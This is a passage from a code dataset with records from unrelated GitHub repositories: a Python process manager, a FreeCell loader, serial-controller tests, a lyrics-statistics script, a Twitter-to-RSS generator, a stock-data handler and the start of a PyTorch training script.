dest=\"list_paths\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Print list of visible configuration file paths and quit.\"\"\"\n )\n\n self.add_argument(\n \"-L\", \"--list-names\",\n dest=\"list_names\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Print list of visible configuration file names and quit.\"\"\"\n )\n\n # -------------------------------------------------------------------------\n def process_parsed_options(self, options):\n\n if options.list_paths:\n for path in self.find_config_names():\n print(path)\n self.exit()\n\n if options.list_names:\n for path in self.find_config_names():\n print(self.config_basename(path))\n self.exit()\n\n for config_path in options.config_paths:\n if not os.path.isfile(config_path):\n self.error(\"'%s' is not a config file name or path\" % (config_path))\n\n return options\n\n # -------------------------------------------------------------------------\n def parse_args(self):\n return self.process_parsed_options(\n argparse.ArgumentParser.parse_args(self)\n )\n\n# ------------------------------------------------------------------------------\ndef get_argument_parser():\n return ArgumentParser(\n prog=os.path.basename(__file__),\n description=\"\"\"launches and manages a group of processes\"\"\"\n )\n\n# ------------------------------------------------------------------------------\ndef merge_configs(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, {})\n merge_configs(value, node)\n elif isinstance(value, list):\n node = destination.setdefault(key, [])\n node += value\n else:\n destination[key] = value\n\n return destination\n\n# ------------------------------------------------------------------------------\nclass ExpansionRegExes(object):\n\n # -------------------------------------------------------------------------\n def _resolve_cmd_which(self, name):\n search_dirs = os.environ.get(\"PATH\", \"\").split(':')\n search_dirs += os.path.dirname(__file__)\n for dir_path in search_dirs:\n cmd_path = os.path.join(dir_path, name)\n if os.path.isfile(cmd_path):\n if stat.S_IXUSR & os.stat(cmd_path)[stat.ST_MODE]:\n return cmd_path\n return name\n\n # -------------------------------------------------------------------------\n def 
_resolve_cmd_wildcard(self, pattern):\n print(pattern)\n return [os.path.realpath(x) for x in glob.glob(pattern)]\n\n # -------------------------------------------------------------------------\n def _resolve_cmd_pathid(self, name):\n return int(hash(name))\n\n # -------------------------------------------------------------------------\n def __init__(self):\n self.commands = {\n \"which\": (\n re.compile(\".*(\\$\\(which (\\w*)\\)).*\"),\n lambda match : self._resolve_cmd_which(match.group(2))\n ),\n \"wildcard\": (\n re.compile(\".*(\\$\\(wildcard (.*)\\)).*\"),\n lambda match : self._resolve_cmd_wildcard(match.group(2))\n ),\n \"pathid\": (\n re.compile(\".*(\\$\\(pathid (([/]\\w*)*)\\)).*\"),\n lambda match : self._resolve_cmd_pathid(match.group(2))\n )\n }\n\n self.variable = re.compile(\".*(\\${([A-Za-z][A-Za-z_0-9]*)}).*\")\n self.list_exp = re.compile(\".*(\\$\\[([A-Za-z][A-Za-z_0-9]*)\\.\\.\\.\\]).*\")\n self.eval_exp = re.compile(\".*(\\$\\(([0-9+*/%-]*)\\)).*\")\n\n# ------------------------------------------------------------------------------\nclass ProcessConfig(object):\n\n # -------------------------------------------------------------------------\n def _fallback(self, name):\n if name in [\"SELF\"]:\n return os.path.abspath(__file__)\n\n if name in [\"BINDIR\", \"BINARY_DIR\"]:\n return os.path.dirname(__file__)\n\n if name in [\"TMPDIR\", \"TEMPDIR\"]:\n return tempfile.gettempdir()\n\n if name in [\"HOME\"]:\n return os.path.expanduser(\"~\")\n\n if name in [\"LOGDIR\"]:\n return \"/var/log\"\n\n if name in [\"DATADIR\"]:\n return \"/var/run\"\n\n if name in [\"EXEPATH\"]:\n return \"$(which ${EXENAME})\"\n\n if name in [\"EXEID\"]:\n return \"$(pathid ${EXEPATH})\"\n\n if name in [\"LOGPATH\"]:\n return \"${LOGDIR}/${EXENAME}.log\"\n\n if name in [\"LOG_SEVERITY\"]:\n return \"info\"\n\n return name\n\n\n # -------------------------------------------------------------------------\n def _do_resolve_env_vars(self, res, name, variables):\n value = str(variables.get(name, os.environ.get(name, self._fallback(name))))\n\n while True:\n found = re.match(res.variable, value)\n if found:\n prev = value[:found.start(1)]\n repl = self._do_resolve_env_vars(\n res,\n found.group(2),\n variables)\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n while True:\n found = re.match(res.eval_exp, value)\n if found:\n prev = value[:found.start(1)]\n repl = str(eval(found.group(2)))\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n while True:\n found_cmd = None\n for cmd_name, cmd_re_func in res.commands.items():\n cmd_re, cmd_func = cmd_re_func\n found = re.match(cmd_re, value)\n if found:\n found_cmd = cmd_name\n break\n\n if found_cmd:\n prev = value[:found.start(1)]\n repl = str(cmd_func(found))\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n return value\n\n # -------------------------------------------------------------------------\n def _resolve_env_vars(self, res, names, variables, info):\n tmp_env = variables.copy()\n tmp_env.update(info.get(\"variables\", {}))\n if type(names) is not list:\n names = [names]\n\n for name in names:\n value = self._do_resolve_env_vars(res, name, tmp_env)\n\n found = re.match(res.list_exp, value)\n if found:\n prev = value[:found.start(1)]\n repl = variables.get(found.group(2), [])\n folw = value[found.end(1):]\n if type(repl) is not list:\n repl = [repl]\n\n for nested_value in self._resolve_env_vars(\n res,\n [prev+name+folw for name in repl],\n tmp_env,\n info): yield 
nested_value\n else:\n yield value\n\n # -------------------------------------------------------------------------\n def __init__(self, options):\n self.full_config = {}\n\n if options.config_paths:\n for config_path in options.config_paths:\n implicit = {\n \"THIS_DIR\": os.path.dirname(os.path.realpath(config_path)),\n \"THIS_CFG\": os.path.splitext(os.path.basename(config_path))[0],\n \"THIS_EXT\": \"\".join(os.path.splitext(os.path.basename(config_path))[1:])\n }\n try:\n with open(config_path) as config_file:\n partial_config = json.load(config_file)\n for proc in partial_config.get(\"processes\", []):\n try:\n proc[\"variables\"].update(implicit)\n except KeyError:\n proc[\"variables\"] = implicit\n\n self.full_config = merge_configs(\n partial_config,\n self.full_config)\n except IOError as io_error:\n print(\"error reading '%s': %s\" % (config_path, io_error))\n except ValueError as value_error:\n print(\"error parsing '%s': %s\" % (config_path, value_error))\n\n for key, value in options.overrides:\n self.full_config.setdefault(\"variables\", {})[key] = value\n\n res = ExpansionRegExes()\n\n env = self.full_config.get(\"variables\", {})\n\n resolve = lambda args, info : self._resolve_env_vars(res, args, env, info)\n\n for info in self.full_config.get(\"processes\", []):\n info[\"cmd\"] = [x for x in resolve(info[\"args\"], info)]\n\n if options.print_config:\n print(\n json.dumps(\n self.full_config,\n sort_keys=True,\n indent=2,\n separators=(', ', ': ')\n )\n )\n\n def process_infos(self):\n return self.full_config.get(\"processes\", [])\n\n# ------------------------------------------------------------------------------\nclass ProcessInfo(object):\n\n # -------------------------------------------------------------------------\n def __init__(self, info):\n self.start_attempts = 0\n self.pid = -1\n self.info = info\n self.handle = None\n self.start_time = None\n self.stop_time = None\n\n # -------------------------------------------------------------------------\n def __del__(self):\n try:\n self.terminate()\n except:\n pass\n\n # -------------------------------------------------------------------------\n def close_on_terminate(self):\n return bool(self.info.get(\"autoclose\", False))\n\n # -------------------------------------------------------------------------\n def is_running(self):\n return self.handle\n\n # -------------------------------------------------------------------------\n def reset(self):\n self.pid = -1\n self.start_time = None\n self.handle = None\n\n # -------------------------------------------------------------------------\n def start(self):\n max_restarts = self.info.get(\"max_restarts\", 3)\n\n if self.start_attempts < max_restarts:\n print(\"starting process '%(name)s': %(cmd)s\" % self.info)\n self.start_attempts += 1\n try:\n self.handle = subprocess.Popen(self.info[\"cmd\"])\n self.pid = self.handle.pid\n self.info[\"pid\"] = self.pid\n self.start_time = time.clock()\n print(\"started process '%(name)s' (%(pid)d)\" % self.info)\n return True\n except:\n print(\"failed to start process '%(name)s'\" % self.info)\n else:\n print(\"maximum number of restarts for '%(name)s' reached\" % self.info)\n\n return False\n\n # -------------------------------------------------------------------------\n def terminate(self):\n if self.handle:\n print(\"terminating process %(name)s (%(pid)d)\" % self.info)\n self.handle.terminate()\n self.reset()\n self.stop_time = time.clock()\n\n# 
------------------------------------------------------------------------------\nclass ProcessList(object):\n\n # -------------------------------------------------------------------------\n def __init__(self, process_config):\n self.infos = {\n info[\"name\"]:\n ProcessInfo(info) for info in process_config.process_infos()\n }\n self.terminating = False\n self.done = False\n\n # -------------------------------------------------------------------------\n def manage(self):\n\n all_running = False\n while not all_running:\n all_running = True\n for name, process in self.infos.items():\n if not process.is_running():\n can_start = True\n for dep in process.info.get(\"depends\", []):\n dep_proc = self.infos.get(dep.get(\"name\"))\n if dep_proc:\n dep_delay = float(dep.get(\"delay\", 0))\n if dep_proc.start_time is None:\n can_start = False\n elif dep_proc.start_time + dep_delay > time.clock():\n can_start = False\n\n if can_start:\n if not process.start():\n return False\n else:\n all_running = False\n return True\n\n # -------------------------------------------------------------------------\n def restart(self, pid):\n for name, process in self.infos.items():\n if process.pid == pid:\n process.reset()\n if not process.close_on_terminate():\n if self.manage():\n return True\n\n return False\n\n # -------------------------------------------------------------------------\n def terminate(self):\n\n self.terminating = True\n for name, process in self.infos.items():\n if process.is_running():\n process.terminate()\n self.done = True\n\n# ------------------------------------------------------------------------------\nprocesses = None\n# ------------------------------------------------------------------------------\ndef terminate_handler(signum, frame):\n global processes\n processes = None\n\n# ------------------------------------------------------------------------------\ndef child_handler(signum, frame):\n global processes\n\n try:\n pid, signum = os.waitpid(-1, os.WNOHANG)\n if processes:\n if not processes.restart(pid):\n processes = None\n except OSError:\n pass\n\n# ------------------------------------------------------------------------------\ndef main():\n argparser = get_argument_parser()\n options = argparser.parse_args()\n config = ProcessConfig(options)\n\n global processes\n processes = ProcessList(config)\n\n signal.signal(signal.SIGINT, terminate_handler)\n signal.signal(signal.SIGTERM, terminate_handler)\n signal.signal(signal.SIGCHLD, child_handler)\n\n if not options.dry_run:\n if processes.manage():\n while processes:\n signal.pause()\n\n# ------------------------------------------------------------------------------\nif __name__ == \"__main__\": main()\n","repo_name":"matus-chochlik/various","sub_path":"python/proman.py","file_name":"proman.py","file_ext":"py","file_size_in_byte":19538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15563342898","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport click\n\n\nnum_to_class = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, '10':10, 'J':11, 'Q':12, 'K':13,\n '0':10} # 0 for abbrev.\nsuite_to_class = {'s':1, 'd':2, 'h':3, 'c':4}\n\nclass_to_num = [None, 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\nclass_to_suite = [None, 's', 'd', 'h', 'c']\n\n\ndef parse(game_path): # returns 7 rows of 8 cols\n c, n, s = defaultdict(int), defaultdict(int), defaultdict(int)\n data = []\n\n with 
open(game_path, 'r') as fp:\n for row in fp:\n row = row.rstrip()\n if row == '': continue\n\n items = row.split(' ')\n if len(items) not in (4, 8): continue\n cards_in_row = [(num_to_class[item[:-1]]-1, suite_to_class[item[-1]]-1) for item in items]\n\n for num, suite in cards_in_row:\n assert 0 <= num <= 12\n assert 0 <= suite <= 3\n c[num*13 + suite] += 1\n n[num] += 1\n s[suite] += 1\n\n data.append(cards_in_row)\n\n for card, occ in c.items():\n if occ >= 2:\n print(class_to_num[1+(card // 13)] + class_to_suite[1+(card % 13)], occ)\n assert len(c) == 52 and len(n) == 13 and len(s) == 4\n\n return data\n\n\ndef transpose(data): # 7x8 -> 8x7\n lines = []\n for c in range(8):\n line = []\n for r in range(7 if c < 4 else 6):\n line.append(data[r][c])\n lines.append(line)\n return lines\n\n\ndef dump_data(data):\n for row in data:\n print(' '.join(class_to_num[1+num] + class_to_suite[1+suite] for num, suite in row))\n\n\n@click.command()\n@click.argument('game-path', type=click.Path(exists=True, readable=True), default='game_8758887.teacher')\ndef main(game_path):\n data = parse(game_path)\n\n dump_data(data)\n print()\n dump_data(transpose(data))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"naoyat/solitaire-solver","sub_path":"freecell_game_loader.py","file_name":"freecell_game_loader.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19713614710","text":"\"\"\"Tests for VMX lib\"\"\"\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom serial import Serial\nfrom serial.tools.list_ports_common import ListPortInfo\nfrom stgctl.lib.vmx import VMX\n\n\n@pytest.fixture()\ndef mock_serial(mocker):\n # Create and return mock serial connection\n mock_serial = MagicMock(spec=Serial)\n mock_serial.write.return_value = None\n mock_serial.readall.return_value = b\"R\"\n mock_serial.port.return_value = \"Test Serial Device\"\n mocker.patch(\"serial.Serial\", return_value=mock_serial)\n return mock_serial\n\n\n@pytest.fixture(autouse=True)\ndef patched_list_ports_grep():\n mock_port_info = ListPortInfo(device=\"Test Serial Device\")\n with patch(\"stgctl.lib.vmx.grep_serial_ports\", return_value=[mock_port_info]):\n yield\n\n\n@pytest.fixture\ndef vmx(mock_serial, monkeypatch):\n mock_serial.readall.return_value = b\"R\"\n port = None\n with patch(\"stgctl.lib.vmx.serial.Serial\", return_value=mock_serial):\n vmx = VMX(port=port)\n mock_serial.write.reset_mock()\n return vmx\n\n\ndef test_vmx_class_with_patched_grep_serial_ports(patched_list_ports_grep, mock_serial):\n vmx = VMX(port=None)\n assert vmx._serial.port() == \"Test Serial Device\"\n\n\ndef test_isready_when_not_ready(vmx, mock_serial):\n # Configure the mock serial connection to return something other than \"R\" when verify is called\n mock_serial.readall.return_value = b\"\"\n\n # Call the isready method and assert that it returns False\n assert vmx.isready() is False\n\n\n# Define a list of method names and their expected arguments\nmethod_args_allow_chain = [\n (\"run\", b\"R\"),\n (\"clear\", b\"C\"),\n (\"origin\", b\"N\"),\n]\n\nmethod_args_immediate = [\n (\"verify\", b\"V\"),\n (\"kill\", b\"K\"),\n (\"decel\", b\"D\"),\n (\"reset\", b\"res\"),\n (\"record_posn\", b\"!\"),\n (\"posn\", b\"X\"),\n (\"posn\", b\"Y\"),\n (\"lst\", b\"lst\"),\n]\n\n\n
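# 'Chained' commands are expected to be buffered on VMX.command_que until run; 'immediate' commands should be written to the serial port at once. The assertions below check exactly that split.\n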
@pytest.mark.parametrize(\n \"method_name, expected_args\", method_args_allow_chain + method_args_immediate\n)\ndef test_vmx_methods(vmx, mock_serial, method_name, expected_args):\n # Retrieve the method dynamically based on the name\n method = getattr(vmx, method_name)\n\n # Call the method without now and perform assertions\n method()\n if (method_name, expected_args) in method_args_allow_chain:\n assert str(vmx.command_que) == expected_args.decode()\n mock_serial.write.assert_not_called()\n if (method_name, expected_args) in method_args_immediate:\n mock_serial.write.assert_called_once_with(expected_args)\n\n\n@pytest.mark.parametrize(\"method_name, expected_args\", method_args_allow_chain)\ndef test_vmx_methods_with_now(vmx, mock_serial, method_name, expected_args):\n # Retrieve the method dynamically based on the name\n method = getattr(vmx, method_name)\n\n # Call the method with now=True and perform assertions\n method(now=True)\n mock_serial.write.assert_called_once_with(expected_args)\n\n\ndef test_echo_with_echo_state_true(vmx, mock_serial):\n # Call the echo method with echo_state=True\n vmx.echo(echo_state=True)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"F\")\n\n\ndef test_echo_with_echo_state_false(vmx, mock_serial):\n # Call the echo method with echo_state=False\n vmx.echo(echo_state=False)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"E\")\n\n\ndef test_move_relative(vmx, mock_serial):\n # Call the move method with relative=True\n vmx.move(now=True, idx=100, motor=1, relative=True)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"I1M100\")\n\n\ndef test_move_absolute(vmx, mock_serial):\n # Call the move method with relative=False\n vmx.move(now=True, idx=100, motor=1, relative=False)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"IA1M100\")\n\n\ndef test_to_limit_positive(vmx, mock_serial):\n mock_serial.readall.return_value = b\"\"\n # Call the to_limit method with pos=True\n vmx.to_limit(now=True, motor=1, pos=True)\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"I1M0\")\n","repo_name":"bdelwood/stgctl","sub_path":"tests/test_lib_vmx.py","file_name":"test_lib_vmx.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74610073973","text":"__author__ = 'Dav-Z'\n\nimport glob\n\n# print(lyrics_file.read())\ndef clean_lyrics_file(lyrics_file, clean_file):\n clean_lines = []\n\n # Process file and clean it up\n for line in lyrics_file:\n line = line.casefold()\n # Extra Extra credit: get rid of punctuation\n # Another way to get rid of the chorus junk\n # line = line.rstrip(\"[chorus]\")\n line = line.rstrip()\n for junk_character in [\",\", \"'\", \"?\", \"!\", \".\"]:\n line = line.replace(junk_character, \"\")\n\n found_junk_line = False\n for junk_line in [\"[chorus]\", \"[chorus:]\"]:\n if junk_line in line:\n found_junk_line = True\n\n # if \"[chorus\" not in line:\n if not found_junk_line:\n if line:\n clean_file.write(line + '\\n')\n clean_lines.append(line)\n\n return clean_lines\n\n\nall_lyrics = []\n# Loop over each file, one at a time\nall_files = glob.glob(\"JayZ/*.txt\")\n
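# note: glob returns paths in arbitrary, platform-dependent order; sort all_files first if a stable processing order matters\n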
\"files\")\nfor infile in all_files:\n\n # stuff below goes here!\n lyricsf = open(infile)\n cleanf = open(infile + '.clean', 'w')\n\n curr_clean_lines = clean_lyrics_file(lyricsf, cleanf)\n all_lyrics.append(curr_clean_lines)\n\n lyricsf.close()\n cleanf.close()\n\n# if all_lyrics:\n# print(\"list is not empty!\")\nprint(\"Got\", len(all_lyrics), \"processed lyrics\")\n\n# from all_lyrics, compute line_counts that are strings\n\nline_counts = []\nlines_seen = 0\nfor lyrics in all_lyrics:\n num_lines = len(lyrics)\n line_counts.append(num_lines)\n lines_seen = lines_seen + num_lines\n\nprint(\"here are counts:\", line_counts)\nprint(\"Lines seen:\", lines_seen)\nprint(\"Direct sum:\", sum(line_counts))\n\n\n\ncounts_as_strings = [str(count) for count in line_counts]\nprint(\"Counts as strings:\", counts_as_strings)\n\n# TODO Create a dictionary from counts_as_strings for a stem-and-leaf plot, e.g.:\n# {'7': ['71', ...], '5': ['52', ...], ...}\n\n# countstr = '39'\n# prefix = countstr[:-1]\n# d = {}\n# '3' in d\n# if '3' not in d:\n# d['3'] = []\n# d['3'].append(countstr)\n\nstem_leaf_data = {}\nfor countstr in counts_as_strings:\n prefix = countstr[:-1]\n if prefix not in stem_leaf_data:\n stem_leaf_data[prefix] = []\n\n stem_leaf_data[prefix].append(countstr[-1])\n\nprint(stem_leaf_data)\n\n# We convert to ints again to get order, and back to strings to get 0-padding\nfor k in sorted(int(val) for val in stem_leaf_data):\n if k < 10:\n to_print = '0' + str(k)\n else:\n to_print = str(k)\n print(to_print, \"|\", ' '.join(stem_leaf_data[str(k)]))\n\n# Bonus challenge: also compute word count, character count\n# Number of occurrences of \"a\" and \"the\"\n\n\n\nprint(\"We're done!\")\n\n","repo_name":"davclark/2015-05-fundamentals-hiphopathy","sub_path":"print_contents.py","file_name":"print_contents.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6485469343","text":"# 9.24 解析并分析Python 源代码\n\n#9.24.1 问题\n\n# 我们想编写程序来解析Python源代码并对此进行一些分析工作\n\n# 9.24.2  解决方案\n# Python可以执行以字符串形式提供的源代码\n\nx = 42\neval('2+3*4 + x')\n# exec('for i in range(10):print(i)')\n# 我们可以使用ast模块将Python源代码编译为一个抽象语法树(AST)这样可以分析源代码\n\n\nimport ast\n\nex = ast.parse('2+3*4 +x',mode='eval')\nprint(ex)\nprint(ast.dump(ex))","repo_name":"mojoru2023/Recoding_Python","sub_path":"Python_Cook(练习)/9.元编程/file.24.py","file_name":"file.24.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22414347302","text":"from dataclasses import dataclass\nimport abc\nimport json\n\n\nto_csv = {str: lambda x: x, dict: lambda x: json.dumps(x)}\nfrom_csv = {str: lambda x: x, dict: lambda x: json.loads(x)}\n\n\nclass DataHandler(abc.ABC):\n @property\n @abc.abstractmethod\n def dict_elems(self):\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def info_data_type_to_slug(self):\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def possible_timespans(self):\n raise NotImplementedError\n\n @classmethod\n @abc.abstractmethod\n def from_data(cls, *args, **kwargs):\n raise NotImplementedError\n\n @classmethod\n def from_dict(cls, d: dict) -> \"DataHandler\":\n obj = cls()\n for elem in cls.dict_elems.keys():\n setattr(obj, elem, d[elem])\n return obj\n\n def to_dict(self) -> dict:\n def inner():\n for elem in self.dict_elems.keys():\n yield elem, getattr(self, elem)\n\n return dict(inner())\n\n @classmethod\n def 
from_csv(cls, l: list) -> \"DataHandler\":\n obj = cls()\n for k, v in cls.dict_elems.items():\n setattr(obj, k, from_csv[v](l.pop(0)))\n return obj\n\n def to_csv(self) -> list:\n def inner():\n for k, v in self.dict_elems.items():\n yield to_csv[v](getattr(self, k))\n\n return list(inner())\n\n def __repr__(self) -> str:\n def inner():\n for k in self.dict_elems.keys():\n yield f\"{k}={getattr(self, k)}\"\n\n return \"<{} {}>\".format(self.__class__.__name__, \" \".join(inner()))\n\n\nclass FrankfurtData(DataHandler):\n dict_elems = {\"isin\": str, \"slug\": str, \"name\": str, \"performance\": dict}\n info_data_type_to_slug = {\"ETP\": \"etf\", \"EQUITY\": \"aktie\"}\n possible_timespans = [\"months1\", \"months3\", \"months6\", \"years1\", \"years2\", \"years3\"]\n\n @classmethod\n def from_data(cls, isin, info_data, performance_data) -> \"FrankfurtData\":\n obj = cls()\n obj.isin: str = isin\n obj.slug: str = (\n cls.info_data_type_to_slug[info_data[\"type\"]] + \"/\" + info_data[\"slug\"]\n )\n obj.name: str = info_data[\"name\"][\"originalValue\"]\n obj.performance: dict = performance_data\n return obj\n\n\nfrom flask import Response\ndef jsonify(d):\n return Response(\n json.dumps(d, cls=FrankfurtDataEncoder), mimetype=\"application/json\"\n )\n\n\n@dataclass\nclass Provider:\n name: str\n css_input_selector: str\n url: str\n search_param: str\n data_search_param: str\n data_handler: DataHandler\n\n\nclass Providers:\n frankfurt = Provider(\n \"frankfurt\",\n \"input.mat-input-element\",\n \"https://www.boerse-frankfurt.de/\",\n f\"de\\?searchTerms=\",\n \"performance\",\n FrankfurtData,\n )\n # wallstreet = Provider(\"wallstreet\", \"#search\", \"https://www.wallstreet-online.de/\", \"searchInst\")\n\n\nclass FrankfurtDataEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, FrankfurtData):\n return o.to_dict()\n return json.JSONEncoder.default(self, o)\n\n\nclass FrankfurtDataDecoder(json.JSONDecoder):\n def __init__(self, *args, **kwargs):\n super().__init__(object_hook=self.object_hook, *args, **kwargs)\n\n def object_hook(self, d: dict):\n if list(FrankfurtData.dict_elems.keys()) == list(d.keys()):\n return FrankfurtData.from_dict(d)\n return d\n","repo_name":"manjaroman2/banana-banana","sub_path":"server/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17494302329","text":"# -*- coding: utf-8 -*-\nimport datetime\n\nfrom twitter import *\nimport PyRSS2Gen\n\n\n\nclass Config:\n def __init__(self, config_path):\n self.config = open(config_path,'r')\n\n def conf_value(line):\n return line.split('=')[1].strip()\n\n for line in self.config:\n value = conf_value(line)\n if line.startswith('consumer_key'):\n self.consumer_key = value\n elif line.startswith('consumer_secret'):\n self.consumer_secret = value\n elif line.startswith('access_token_key'):\n self.access_token_key = value\n elif line.startswith('access_token_secret'):\n self.access_token_secret = value\n elif line.startswith('user_id'):\n self.user_id = value\n\n\nclass MyFeed:\n def __init__(self, config_path=\"config\", xml_out_file=\"pyrss2gen.xml\"):\n self.config = Config(config_path)\n self.statuses_file = \"\"\n self.title = \"Vanderloos PyRSS2Gen feed\"\n self.link = \"http://twitter.com/van_der_loos\"\n self.description = \"The latest tweets from vanderloos' friends\"\n self.xml_out_file = xml_out_file\n\n def get_feed(self,num=50):\n api = 
Twitter(auth=OAuth(self.config.access_token_key,\n self.config.access_token_secret, self.config.consumer_key, self.config.consumer_secret))\n\n rss = PyRSS2Gen.RSS2(self.title, self.link, self.description,\n lastBuildDate=datetime.datetime.now(), items=[])\n if self.statuses_file:\n twitter_statuses = open(self.statuses_file, 'w')\n twitter_statuses.write('')\n twitter_statuses.close()\n twitter_statuses = open(self.statuses_file, 'a')\n statuses_sum = api.statuses.home_timeline(count=num)\n\n statuses_sum.sort(key=lambda tweet: tweet['created_at'], reverse=False)\n\n for tweet in statuses_sum:\n tweet_text = tweet['text'].replace('і','i').replace('є','je').replace('ї','ji').replace('Є','je').replace('Ї','ji').replace('І','I')\n item = PyRSS2Gen.RSSItem(title='@' + tweet['user']['screen_name'] + ': ' + tweet_text)\n tweet_url = r'https://twitter.com/' + tweet['user']['screen_name'] + r'/status/' + tweet['id_str']\n if tweet['in_reply_to_status_id']:\n tweet_replied = api.statuses.show(id = tweet['in_reply_to_status_id'])\n text_replied = tweet_replied['text']\n item.description = str(r'In reply to: ' + tweet['in_reply_to_screen_name'] + ': ' + text_replied) + '<br/>The original text: ' + tweet_text\n else: item.description = r'tweet link<br/>' + tweet_text\n if tweet['entities']['urls']:\n item.link = tweet['entities']['urls'][0]['expanded_url']\n\n item.guid = PyRSS2Gen.Guid(tweet_url)\n item.pubDate = tweet['created_at']\n item.author = tweet['user']['name']\n\n rss.items.append(item)\n '''if self.statuses_file:\n twitter_statuses.write(tweet['user']['name']) + '\\n'\n twitter_statuses.write(tweet['text']) + '\\n'\n\t\t\t'''\n rss.write_xml(open(self.xml_out_file, \"w\"), encoding = 'utf-8')\n if self.statuses_file:\n twitter_statuses.close()\n\n\ndef feed(config, out):\n a = MyFeed(config_path=config, xml_out_file=out)\n a.get_feed()\n return 'Success'\n","repo_name":"vanderloos/tweetfeed","sub_path":"tweetfeed.py","file_name":"tweetfeed.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39863360480","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nimport seaborn as sns\nimport random\nimport cv2\nimport copy\nimport os\nimport os.path as osp\nfrom sklearn.model_selection import train_test_split\nimport time\nimport sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.models as models\nfrom torch import optim\nfrom torchvision.datasets import ImageFolder\nfrom torchvision.utils import make_grid\nimport torchvision.transforms as T\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset\nfrom PIL import Image\n\nfrom sklearn.metrics import confusion_matrix\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ndef init_seeds(seed=0, cuda_deterministic=True):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n # Speed-reproducibility tradeoff https://pytorch.org/docs/stable/notes/randomness.html\n if cuda_deterministic: # slower, more reproducible\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n else: # faster, less reproducible\n torch.backends.cudnn.deterministic = False\n torch.backends.cudnn.benchmark = True\n \n \n# Declare data augmentation transforms\ndef transform_data(mode):\n if mode=='train':\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.RandomHorizontalFlip(),\n T.RandomRotation(10),\n T.RandomGrayscale(),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n elif mode=='val':\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n else:\n img_transforms = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize([0.489, 0.456, 0.406], [0.229, 0.224, 0.225])\n \n ])\n \n return img_transforms\n\n\ndef accuracy(preds, labels):\n preds = torch.exp(preds)\n top_p,top_class = preds.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n return torch.mean(equals.type(torch.FloatTensor))\n\ndef test(model, test_loader, criterion):\n model.eval()\n steps = len(test_loader)\n \n val_loss = 0.0\n val_acc = 0.0\n \n with torch.no_grad():\n for batch_id, (imgs, trgt) in tqdm(enumerate(test_loader)):\n imgs = imgs.to(device)\n trgt = trgt.to(device)\n \n preds = model(imgs)\n loss = criterion(preds, trgt)\n \n val_loss += loss.item()\n \n val_acc += accuracy(preds, trgt)\n \n print(f'[TEST]: Loss: 
